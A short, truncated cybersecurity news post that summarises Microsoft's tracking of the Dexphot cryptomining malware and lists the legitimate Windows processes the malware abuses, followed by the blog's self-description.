A new malware strain dubbed Dexphot attacking windows computers to mine cryptocurrency, monitoring services, and scheduled tasks to rerun the infection if windows defender removed it. The malware uses files techniques it gets malicious codes executed directly in memory and also it hijacks the legitimate process to hide the malicious activity. Microsoft closely tracked the threat since 2018, the threat actors continuously improve the malware, target new processes, and defense mechanism. Malicious Behaviour Dexphot Behaviour & Infection Chain The malware employs multiple levels of polymorphism across the binaries it distributes, files techniques and behavior-based detection for protection. The malware abuses the following legitimate process that includes msiexec.exe – Microsoft process to install, modify, and perform operations on Windows Installer unzip.exe – Extraction Utility rundll32.exe – Used to run DLL files schtasks.exe – To create scheduled ...
The Hacks001 blog is the most popular, independent and trusted source for the latest news headlines on cybersecurity, hacking, computer security, cybercrime, privacy, vulnerabilities and technology for all businesses, information security professionals and hackers worldwide.